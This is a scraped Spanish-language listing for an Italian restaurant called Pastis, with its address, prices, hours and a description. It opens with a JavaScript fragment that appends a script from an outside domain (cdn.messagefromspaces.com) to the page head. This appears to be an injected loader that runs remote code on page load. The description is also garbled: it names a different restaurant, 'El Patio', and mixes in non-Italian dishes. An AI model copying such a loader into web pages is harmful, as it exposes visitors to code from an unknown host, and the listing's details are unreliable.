, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Pastis Ristorante

Pastis

Dirección:Crr 4A # 27 – 86
Zona:
Otros
Precio Promedio Plato por Persona: 
Entre 20.000  y 30.000 pesos
Formas de Pago:
  Recibe  Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Categoría:Italiano

El Patio es un restaurante ubicado en la zona de la Macarena, que cuenta con una atmosfera intima, recreada con mesas que tienen lámparas encendidas a media luz, bossanova, tango, música francesa y chillout, así es El patio. Este restaurante se caracteriza por su ambiente íntimo y sus platos de alta calidad.

De su menú se destaca el fillet Mignon, la Parilla Garzón, mariscos a la plancha, la ensalada Mikonos, queso fetta, zucchini, albahaca, yerbabuena, aceituna, y tomate, que puedes acompañar con una variada carta de vinos en la que está incluido lo mejor de Chile, España y Argentina.

Este restaurante es especial para ir en compañia de la familia, y los amigos ya que se presta para una cena familiar formal. El lugar es perfecto para compartir una celebración como un grado o un aniversario importante.

Un excelente lugar para disfrutar de la gastronomía tradicional italiana en un ambiente sin igual.
La Ternera.
Exquisita ternera al mejor estilo italiano

Horario de atención
Lunes a Sábado: 12m a 11pm
Domingos y Festivos: 12m a 5pm

Comedor

Comedor

Deja un comentario